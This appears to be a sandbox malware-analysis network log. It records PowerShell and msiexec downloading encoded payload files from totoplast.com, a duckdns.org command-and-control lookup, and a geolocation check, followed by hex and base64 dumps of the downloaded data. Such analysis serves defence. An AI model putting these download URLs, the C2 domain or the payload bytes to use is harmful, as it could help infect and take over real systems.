                                                  Oct 21, 2024 17:05:21.305414915 CEST192.168.2.81.1.1.10xc5a3Standard query (0)gormezl_6777.6777.6777.677eA (IP address)IN (0x0001)false
                                                  Oct 21, 2024 17:05:24.372006893 CEST192.168.2.81.1.1.10xd80fStandard query (0)totoplast.comA (IP address)IN (0x0001)false
                                                  Oct 21, 2024 17:05:55.123523951 CEST192.168.2.81.1.1.10xc536Standard query (0)renajazinw.duckdns.orgA (IP address)IN (0x0001)false
                                                  Oct 21, 2024 17:05:56.124644995 CEST192.168.2.81.1.1.10xc536Standard query (0)renajazinw.duckdns.orgA (IP address)IN (0x0001)false
                                                  Oct 21, 2024 17:05:57.124732018 CEST192.168.2.81.1.1.10xc536Standard query (0)renajazinw.duckdns.orgA (IP address)IN (0x0001)false
                                                  Oct 21, 2024 17:06:00.626456976 CEST192.168.2.81.1.1.10x14dbStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Oct 21, 2024 17:05:21.321065903 CEST1.1.1.1192.168.2.80xc5a3Name error (3)gormezl_6777.6777.6777.677enonenoneA (IP address)IN (0x0001)false
                                                  Oct 21, 2024 17:05:24.831897974 CEST1.1.1.1192.168.2.80xd80fNo error (0)totoplast.com192.185.113.96A (IP address)IN (0x0001)false
                                                  Oct 21, 2024 17:05:59.134072065 CEST1.1.1.1192.168.2.80xc536Server failure (2)renajazinw.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                  Oct 21, 2024 17:05:59.134089947 CEST1.1.1.1192.168.2.80xc536Server failure (2)renajazinw.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                  Oct 21, 2024 17:06:00.638137102 CEST1.1.1.1192.168.2.80x14dbNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                  • totoplast.com
                                                  • geoplugin.net
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.865099178.237.33.50804064C:\Windows\SysWOW64\msiexec.exe
                                                  TimestampBytes transferredDirectionData
                                                  Oct 21, 2024 17:06:00.644320011 CEST71OUTGET /json.gp HTTP/1.1
                                                  Host: geoplugin.net
                                                  Cache-Control: no-cache
                                                  Oct 21, 2024 17:06:01.532021999 CEST1168INHTTP/1.1 200 OK
                                                  date: Mon, 21 Oct 2024 15:06:01 GMT
                                                  server: Apache
                                                  content-length: 960
                                                  content-type: application/json; charset=utf-8
                                                  cache-control: public, max-age=300
                                                  access-control-allow-origin: *
                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 32 31 36 2e 35 32 2e 31 38 33 2e 31 35 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                                                  Data Ascii: { "geoplugin_request":"216.52.183.150", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7157", "geoplugin_longitude":"-74", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                                                  Oct 21, 2024 17:06:01.532618046 CEST1168INHTTP/1.1 200 OK
                                                  date: Mon, 21 Oct 2024 15:06:01 GMT
                                                  server: Apache
                                                  content-length: 960
                                                  content-type: application/json; charset=utf-8
                                                  cache-control: public, max-age=300
                                                  access-control-allow-origin: *
                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 32 31 36 2e 35 32 2e 31 38 33 2e 31 35 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                                                  Data Ascii: { "geoplugin_request":"216.52.183.150", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7157", "geoplugin_longitude":"-74", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.849708192.185.113.964435976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-21 15:05:25 UTC173OUTGET /r5/Costiform.ocx HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                  Host: totoplast.com
                                                  Connection: Keep-Alive
                                                  2024-10-21 15:05:25 UTC209INHTTP/1.1 200 OK
                                                  Date: Mon, 21 Oct 2024 15:05:25 GMT
                                                  Server: Apache
                                                  Upgrade: h2,h2c
                                                  Connection: Upgrade, close
                                                  Last-Modified: Mon, 21 Oct 2024 06:38:11 GMT
                                                  Accept-Ranges: bytes
                                                  Content-Length: 485896
                                                  2024-10-21 15:05:25 UTC7983INData Raw: 63 51 47 62 36 77 4c 2f 7a 4c 73 36 53 51 6b 41 36 77 49 44 4e 58 45 42 6d 77 4e 63 4a 41 54 72 41 73 41 33 36 77 4b 6d 42 72 6b 53 7a 6e 65 7a 63 51 47 62 63 51 47 62 67 65 6d 2b 67 6f 30 44 36 77 4a 71 52 65 73 43 36 70 4b 42 36 56 52 4c 36 71 2f 72 41 68 4e 4b 63 51 47 62 63 51 47 62 36 77 4c 59 44 4c 6f 30 30 51 67 47 63 51 47 62 36 77 4c 49 4e 6e 45 42 6d 33 45 42 6d 7a 48 4b 63 51 47 62 63 51 47 62 69 52 51 4c 36 77 49 55 32 33 45 42 6d 39 48 69 36 77 4a 76 50 75 73 43 6c 33 43 44 77 51 54 72 41 6a 46 57 63 51 47 62 67 66 6d 47 53 63 55 44 66 4d 78 78 41 5a 76 72 41 6a 78 72 69 30 51 6b 42 4f 73 43 79 71 68 78 41 5a 75 4a 77 2b 73 43 64 32 76 72 41 6c 53 49 67 63 4e 4f 36 64 55 43 36 77 4b 67 73 6e 45 42 6d 37 70 66 49 69 31 57 36 77 4a 35 34 58 45
                                                  Data Ascii: cQGb6wL/zLs6SQkA6wIDNXEBmwNcJATrAsA36wKmBrkSznezcQGbcQGbgem+go0D6wJqResC6pKB6VRL6q/rAhNKcQGbcQGb6wLYDLo00QgGcQGb6wLINnEBm3EBmzHKcQGbcQGbiRQL6wIU23EBm9Hi6wJvPusCl3CDwQTrAjFWcQGbgfmGScUDfMxxAZvrAjxri0QkBOsCyqhxAZuJw+sCd2vrAlSIgcNO6dUC6wKgsnEBm7pfIi1W6wJ54XE
                                                  2024-10-21 15:05:25 UTC8000INData Raw: 67 49 49 66 69 78 7a 78 6f 63 6a 71 7a 4c 64 49 6f 32 46 57 79 50 72 62 37 36 75 7a 63 58 62 36 79 58 30 6e 64 59 6a 2f 79 69 77 66 50 79 71 51 79 2f 52 64 75 32 50 4a 33 4b 2f 71 52 62 46 75 31 44 6b 33 2b 63 36 70 52 76 42 43 51 36 7a 38 6a 32 56 57 5a 6c 61 2f 58 78 57 52 77 73 74 68 46 63 33 49 47 50 6f 4b 50 43 67 43 64 63 65 50 77 77 54 2b 66 53 67 67 75 32 45 67 35 50 69 6a 71 79 63 65 6c 46 65 72 4f 36 31 68 7a 72 4b 34 55 43 4d 35 35 77 51 58 54 4c 39 4a 4b 65 7a 37 50 2f 38 56 53 46 49 5a 53 49 30 7a 62 73 6b 2b 6a 69 35 4a 55 5a 5a 6f 38 50 4f 42 50 31 49 50 69 51 4e 52 5a 75 30 44 55 57 62 74 41 31 46 6d 37 51 4e 52 5a 75 30 44 55 57 62 74 41 31 46 6d 37 51 4e 52 5a 75 39 33 6f 5a 52 47 41 79 71 59 53 32 45 7a 44 49 4d 51 72 37 50 64 42 31 46
                                                  Data Ascii: gIIfixzxocjqzLdIo2FWyPrb76uzcXb6yX0ndYj/yiwfPyqQy/Rdu2PJ3K/qRbFu1Dk3+c6pRvBCQ6z8j2VWZla/XxWRwsthFc3IGPoKPCgCdcePwwT+fSggu2Eg5PijqycelFerO61hzrK4UCM55wQXTL9JKez7P/8VSFIZSI0zbsk+ji5JUZZo8POBP1IPiQNRZu0DUWbtA1Fm7QNRZu0DUWbtA1Fm7QNRZu93oZRGAyqYS2EzDIMQr7PdB1F
                                                  2024-10-21 15:05:25 UTC8000INData Raw: 55 7a 7a 41 41 4f 72 5a 4b 38 39 74 64 56 5a 2b 54 64 47 31 54 37 63 74 68 4a 62 6c 41 31 4a 56 62 57 63 56 42 6a 63 30 7a 36 78 48 32 6e 32 55 64 50 39 44 65 58 71 4b 59 73 72 76 66 6f 6e 48 6f 5a 56 35 33 58 63 54 54 78 55 65 57 73 79 6b 5a 63 6a 6c 77 47 6d 4d 44 30 41 5a 2b 31 6c 6d 37 2f 77 67 67 76 6d 5a 56 72 73 78 63 61 39 4c 70 2b 70 30 7a 33 79 42 56 71 36 72 6f 50 72 73 36 73 74 4a 4b 73 31 39 56 71 2b 57 51 55 73 54 74 33 46 32 2f 73 6c 5a 4a 50 34 4b 5a 70 33 6f 6b 75 36 75 75 58 68 55 38 64 2f 76 66 47 2f 57 44 32 59 30 7a 53 53 47 74 54 5a 53 39 31 37 2f 36 79 57 44 73 59 49 31 56 31 76 53 6f 41 79 7a 76 72 63 33 64 30 54 4b 6b 64 68 41 6d 52 54 38 53 73 43 4d 48 50 70 6d 4f 44 77 55 48 37 68 6c 53 77 54 71 38 53 6a 45 4e 32 45 32 55 4d 70
                                                  Data Ascii: UzzAAOrZK89tdVZ+TdG1T7cthJblA1JVbWcVBjc0z6xH2n2UdP9DeXqKYsrvfonHoZV53XcTTxUeWsykZcjlwGmMD0AZ+1lm7/wggvmZVrsxca9Lp+p0z3yBVq6roPrs6stJKs19Vq+WQUsTt3F2/slZJP4KZp3oku6uuXhU8d/vfG/WD2Y0zSSGtTZS917/6yWDsYI1V1vSoAyzvrc3d0TKkdhAmRT8SsCMHPpmODwUH7hlSwTq8SjEN2E2UMp
                                                  2024-10-21 15:05:25 UTC8000INData Raw: 6b 66 44 67 48 37 66 36 52 56 42 78 65 56 61 38 47 4e 70 38 56 4f 6f 61 33 59 58 50 78 56 61 2f 6a 64 47 42 64 4d 6b 5a 50 4c 69 51 2b 79 6a 46 57 6f 56 30 66 2b 7a 35 73 62 4f 67 42 55 74 78 34 47 32 4e 6b 31 35 4d 54 38 75 46 4a 55 4f 59 75 34 32 71 51 73 68 34 59 71 69 43 65 30 44 68 6b 62 46 56 37 77 6a 63 52 50 6e 33 36 67 4b 52 4c 38 31 30 71 51 63 50 35 2b 53 75 38 74 4c 58 31 51 30 63 58 73 6b 2f 56 72 79 74 41 31 46 6d 37 51 4e 52 5a 75 30 44 55 57 62 74 41 31 46 6d 37 51 4e 52 5a 75 30 44 55 57 62 74 41 31 46 6d 37 31 67 69 68 75 73 68 6a 30 43 37 6a 31 56 6d 37 2b 6e 78 58 4a 46 4e 56 6d 78 36 48 45 45 49 36 73 75 53 73 56 4e 34 59 4d 4b 31 4a 52 4f 6a 56 44 6c 41 79 55 44 69 44 50 37 7a 56 76 2b 54 56 46 4d 46 5a 6a 74 6c 64 68 42 4a 43 64 54
                                                  Data Ascii: kfDgH7f6RVBxeVa8GNp8VOoa3YXPxVa/jdGBdMkZPLiQ+yjFWoV0f+z5sbOgBUtx4G2Nk15MT8uFJUOYu42qQsh4YqiCe0DhkbFV7wjcRPn36gKRL810qQcP5+Su8tLX1Q0cXsk/VrytA1Fm7QNRZu0DUWbtA1Fm7QNRZu0DUWbtA1Fm71gihushj0C7j1Vm7+nxXJFNVmx6HEEI6suSsVN4YMK1JROjVDlAyUDiDP7zVv+TVFMFZjtldhBJCdT
                                                  2024-10-21 15:05:26 UTC8000INData Raw: 54 4a 52 6f 45 53 61 37 68 73 35 6c 50 49 5a 76 53 70 33 67 68 6a 4e 7a 59 42 43 68 72 49 72 72 50 39 6c 72 32 65 6e 67 45 41 64 32 33 46 6a 30 69 47 6f 54 68 4c 73 36 42 44 6f 37 68 2b 54 7a 2f 64 52 6e 4c 54 52 62 68 4f 47 6c 63 38 56 7a 54 58 66 48 47 37 4e 78 64 76 72 70 48 53 64 78 4d 4e 50 33 4e 44 2b 48 55 73 42 37 59 34 31 50 7a 32 75 5a 2b 79 78 2f 78 78 45 46 37 32 2f 6d 69 45 66 37 73 59 49 31 49 6a 2b 7a 66 73 64 4b 34 31 7a 4a 68 78 74 68 53 55 73 59 35 47 48 34 37 75 53 77 47 33 62 63 57 6d 77 30 59 69 70 58 63 49 75 36 6e 59 6c 33 59 36 51 30 70 73 33 32 6a 37 74 4a 79 55 69 72 33 6a 71 4e 74 33 32 54 65 64 45 47 33 38 2f 33 59 7a 59 52 45 6c 57 52 32 34 58 6b 6e 74 4d 52 62 38 37 39 41 36 65 53 4a 43 6f 5a 57 50 38 52 2b 58 62 74 39 6f 53
                                                  Data Ascii: TJRoESa7hs5lPIZvSp3ghjNzYBChrIrrP9lr2engEAd23Fj0iGoThLs6BDo7h+Tz/dRnLTRbhOGlc8VzTXfHG7NxdvrpHSdxMNP3ND+HUsB7Y41Pz2uZ+yx/xxEF72/miEf7sYI1Ij+zfsdK41zJhxthSUsY5GH47uSwG3bcWmw0YipXcIu6nYl3Y6Q0ps32j7tJyUir3jqNt32TedEG38/3YzYRElWR24XkntMRb879A6eSJCoZWP8R+Xbt9oS
                                                  2024-10-21 15:05:26 UTC8000INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                  2024-10-21 15:05:26 UTC8000INData Raw: 45 77 54 2f 76 73 73 6e 75 44 79 66 4a 4d 6c 43 6c 33 56 47 70 77 46 6e 36 4e 49 77 33 57 6d 51 62 32 67 38 2b 68 30 41 30 62 30 31 2b 54 68 57 74 2b 43 73 59 36 2f 59 39 43 41 65 79 77 64 49 36 30 34 61 45 73 62 48 78 79 58 48 61 71 5a 51 44 47 70 47 48 72 69 5a 52 6b 65 55 6d 55 5a 6e 67 77 61 64 52 52 4b 76 34 46 33 65 4f 78 35 6f 4a 41 65 68 4f 4a 73 4a 38 42 4c 4c 33 65 35 7a 53 31 73 63 67 2b 39 57 36 64 76 33 66 4a 65 72 32 73 55 42 56 4f 52 6d 4c 35 72 77 4f 33 75 4b 4e 57 48 2f 6e 72 67 45 37 42 65 59 59 56 54 4b 7a 2b 39 43 66 38 42 64 72 70 36 6c 6c 2b 74 68 4d 42 4c 61 70 31 63 45 6a 32 62 6e 6d 43 39 68 4d 65 71 63 71 4a 42 46 49 30 46 70 42 37 63 53 44 6d 61 5a 2b 6f 50 45 45 45 6b 69 50 38 52 62 7a 46 4d 30 79 4a 6a 52 77 51 58 78 53 51 71
                                                  Data Ascii: EwT/vssnuDyfJMlCl3VGpwFn6NIw3WmQb2g8+h0A0b01+ThWt+CsY6/Y9CAeywdI604aEsbHxyXHaqZQDGpGHriZRkeUmUZngwadRRKv4F3eOx5oJAehOJsJ8BLL3e5zS1scg+9W6dv3fJer2sUBVORmL5rwO3uKNWH/nrgE7BeYYVTKz+9Cf8Bdrp6ll+thMBLap1cEj2bnmC9hMeqcqJBFI0FpB7cSDmaZ+oPEEEkiP8RbzFM0yJjRwQXxSQq
                                                  2024-10-21 15:05:26 UTC8000INData Raw: 47 69 59 73 46 4c 42 64 72 36 78 42 36 79 64 68 38 43 63 77 70 41 73 45 6a 79 77 6b 46 2b 4e 68 4d 36 33 32 31 4d 38 45 54 5a 35 4f 38 57 51 73 6e 79 54 5a 51 67 64 32 79 59 45 45 33 7a 7a 46 33 79 2f 37 58 63 58 30 48 76 52 77 5a 72 37 64 75 4e 74 7a 56 68 2f 59 4a 65 6e 70 4e 53 5a 74 74 72 70 35 36 67 39 53 2f 41 70 55 6d 37 59 6e 68 4a 75 32 54 35 45 38 54 62 31 6c 41 31 46 6d 37 51 4e 52 5a 75 30 44 55 57 62 74 41 31 46 6d 37 51 4e 52 5a 75 30 44 55 57 62 74 41 31 46 6d 37 31 6d 62 35 35 4a 41 30 73 63 45 78 30 46 6e 74 2f 6f 46 67 69 31 42 56 74 30 44 54 49 4b 55 36 74 6f 58 35 58 75 4a 56 6e 7a 76 43 39 68 63 79 58 6b 6c 47 4f 39 62 49 78 49 67 47 6c 2f 36 32 63 71 57 76 72 79 4c 51 34 4b 31 79 33 57 76 2f 78 32 44 4f 68 44 6a 51 46 69 61 30 49 64
                                                  Data Ascii: GiYsFLBdr6xB6ydh8CcwpAsEjywkF+NhM6321M8ETZ5O8WQsnyTZQgd2yYEE3zzF3y/7XcX0HvRwZr7duNtzVh/YJenpNSZttrp56g9S/ApUm7YnhJu2T5E8Tb1lA1Fm7QNRZu0DUWbtA1Fm7QNRZu0DUWbtA1Fm71mb55JA0scEx0Fnt/oFgi1BVt0DTIKU6toX5XuJVnzvC9hcyXklGO9bIxIgGl/62cqWvryLQ4K1y3Wv/x2DOhDjQFia0Id
                                                  2024-10-21 15:05:26 UTC8000INData Raw: 37 51 4e 52 5a 75 30 44 55 57 62 74 41 31 46 6d 37 51 4e 52 5a 75 30 44 55 57 62 74 41 31 46 6d 37 51 4e 52 5a 49 49 34 38 48 79 62 4b 64 2b 51 2f 31 51 72 59 76 32 52 58 63 6e 43 31 76 4d 43 51 56 46 59 4f 42 4e 63 75 43 79 37 42 49 77 74 6c 5a 37 72 59 66 44 31 77 30 72 2f 4a 34 33 61 67 6e 4a 67 31 71 37 67 6e 42 31 51 74 65 6a 53 6a 4a 54 49 62 66 46 75 54 72 43 63 34 59 39 35 42 78 31 45 70 2f 64 33 62 34 7a 77 66 76 4b 32 72 4e 4a 6a 35 54 49 57 4c 32 4a 64 6b 77 63 58 79 7a 78 6a 6e 4c 4f 73 72 71 4e 6f 36 77 6c 70 4e 54 61 52 2f 7a 76 34 7a 6f 58 79 2f 55 63 76 54 46 2f 6c 6a 53 42 51 72 59 69 34 67 51 65 37 76 52 55 72 59 6a 32 54 42 47 50 6b 61 68 4f 47 5a 39 74 58 76 76 73 42 33 41 50 4a 31 6a 4a 44 64 46 65 46 71 34 46 6b 66 62 43 64 37 38 44
                                                  Data Ascii: 7QNRZu0DUWbtA1Fm7QNRZu0DUWbtA1Fm7QNRZII48HybKd+Q/1QrYv2RXcnC1vMCQVFYOBNcuCy7BIwtlZ7rYfD1w0r/J43agnJg1q7gnB1QtejSjJTIbfFuTrCc4Y95Bx1Ep/d3b4zwfvK2rNJj5TIWL2JdkwcXyzxjnLOsrqNo6wlpNTaR/zv4zoXy/UcvTF/ljSBQrYi4gQe7vRUrYj2TBGPkahOGZ9tXvvsB3APJ1jJDdFeFq4FkfbCd78D
                                                  2024-10-21 15:05:26 UTC8000INData Raw: 6a 4d 35 33 34 34 61 50 2b 59 66 32 77 50 55 4b 71 43 30 78 58 39 67 65 45 41 7a 62 57 53 54 35 49 35 67 72 30 34 79 57 5a 56 61 63 77 64 6a 47 37 41 4e 52 5a 55 36 76 4f 58 62 73 51 50 4a 6b 49 51 74 51 78 4b 79 55 79 67 33 63 37 69 75 6d 73 7a 51 73 39 66 4f 44 45 72 34 4a 65 73 76 57 32 39 33 34 38 42 59 7a 54 64 70 34 36 6e 59 39 32 37 31 33 41 49 4e 69 72 58 79 32 6c 52 6e 41 54 2f 6e 62 59 6a 32 54 44 30 34 45 61 47 41 72 72 63 33 43 75 7a 64 61 6c 6e 2f 55 6f 46 45 70 50 62 48 65 68 7a 6a 75 31 5a 64 54 68 38 48 70 62 4b 41 39 6a 57 79 74 46 44 67 54 5a 41 54 44 6c 77 53 4e 77 68 58 6a 73 32 45 77 49 50 58 77 75 77 52 4f 72 4b 35 6e 2f 32 45 77 34 36 42 53 6b 79 64 4e 75 36 4e 47 44 50 4d 44 4f 50 4b 4d 76 73 62 4e 6d 4f 66 4a 73 6c 42 79 4a 55 72
                                                  Data Ascii: jM5344aP+Yf2wPUKqC0xX9geEAzbWST5I5gr04yWZVacwdjG7ANRZU6vOXbsQPJkIQtQxKyUyg3c7iumszQs9fODEr4JesvW29348BYzTdp46nY92713AINirXy2lRnAT/nbYj2TD04EaGArrc3Cuzdaln/UoFEpPbHehzju1ZdTh8HpbKA9jWytFDgTZATDlwSNwhXjs2EwIPXwuwROrK5n/2Ew46BSkydNu6NGDPMDOPKMvsbNmOfJslByJUr


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.849716192.185.113.964434064C:\Windows\SysWOW64\msiexec.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-21 15:05:53 UTC182OUTGET /r5/JfcplHmBpoWXVfH37.bin HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                  Host: totoplast.com
                                                  Cache-Control: no-cache
                                                  2024-10-21 15:05:53 UTC249INHTTP/1.1 200 OK
                                                  Date: Mon, 21 Oct 2024 15:05:53 GMT
                                                  Server: Apache
                                                  Upgrade: h2,h2c
                                                  Connection: Upgrade, close
                                                  Last-Modified: Mon, 21 Oct 2024 06:33:49 GMT
                                                  Accept-Ranges: bytes
                                                  Content-Length: 494656
                                                  Content-Type: application/octet-stream
                                                  2024-10-21 15:05:53 UTC7943INData Raw: fc 56 e8 1e 76 47 e5 35 0a 39 8f 0b 8b 25 b2 f0 45 23 04 bc 26 17 77 1f 91 3e a8 09 2d 36 a3 88 56 9a f5 6c a2 17 a3 7c 92 b7 86 1b a0 08 c5 d3 3a 72 10 f5 bd a5 3d 06 14 38 54 4f fd 8a 34 7e e5 19 ac 66 a8 79 d6 2e 58 01 28 5d 01 1c 1c 5c 91 e2 a7 25 9d b0 fe 69 7d d4 ce 7d 50 a5 94 75 75 a7 12 03 31 ef 45 de 00 91 c0 ed e6 44 9d c7 67 48 d6 a3 a2 70 72 55 d7 87 2e c0 a8 3c b1 7b 4f db 6c 7c ca 45 e9 fa 4a 51 fc cb a2 45 c2 38 e2 a1 28 a9 04 5e ba 02 d4 b9 2d 94 03 6c 9f 9d 99 b5 67 99 a0 93 d3 34 6b 06 70 98 51 38 3a 10 73 00 ea 97 68 ec 42 49 fb bc c7 0c 44 8f aa c2 b7 98 e2 8d 49 00 f6 ef 82 d8 cf b4 4c 98 10 0e 89 0d f5 8f fa a0 2d f5 0a da 67 1c 82 e7 bb c7 eb c3 26 64 0e a0 14 bf c4 1c 24 23 02 97 70 89 bb fb 94 d7 d1 8b c6 23 53 d5 38 a3 8d 37 8c
                                                  Data Ascii: VvG59%E#&w>-6Vl|:r=8TO4~fy.X(]\%i}}Puu1EDgHprU.<{Ol|EJQE8(^-lg4kpQ8:shBIDIL-g&d$#p#S87
                                                  2024-10-21 15:05:53 UTC8000INData Raw: 2e a3 18 69 90 0e ac 18 01 f6 53 08 3e 98 e5 45 7b 37 47 9e af de 26 05 98 78 7c 57 3d f2 d9 95 31 e1 02 f0 64 98 17 8c 9d c2 92 4f f4 77 16 59 d5 44 cb b9 d3 6f b3 d1 59 68 a2 1b f8 8c 3a 81 07 8d 4b 88 ff ef ed 9f 6d 47 ea 85 bb 17 67 57 e5 3a 45 ef 44 e8 4b ab 77 3d 0a 38 40 40 0c 31 00 61 77 95 dc 89 8b af 4d f0 41 35 8a a5 97 08 f1 45 c1 80 6b 68 fd ed fe 9d ed fe d1 35 39 2b fc 68 ef df 4c 1e a7 a8 db b1 ae e2 f2 3c 74 8b af 5a 1f bd 9d 42 10 03 31 66 00 32 83 dc 3c 12 0d 7c 14 a2 97 c3 93 ab 2b 35 7a 93 92 7b 2c 80 e0 b6 fc 93 a9 57 20 8d 35 7a 28 df d5 eb fd 87 e6 21 7a 97 ce 2e 09 d9 76 31 65 e7 9e 94 0d 34 e1 4f 0d 0d 66 e8 ed 77 f5 e9 2d 07 47 ea c5 cc 0e 24 e2 ff f6 15 78 0d b9 b1 b0 36 33 54 1d 08 44 8f f3 92 53 11 b3 5f fe 99 e4 9d a0 c2 73
                                                  Data Ascii: .iS>E{7G&x|W=1dOwYDoYh:KmGgW:EDKw=8@@1awMA5Ekh59+hL<tZB1f2<|+5z{,W 5z(!z.v1e4Ofw-G$x63TDS_s
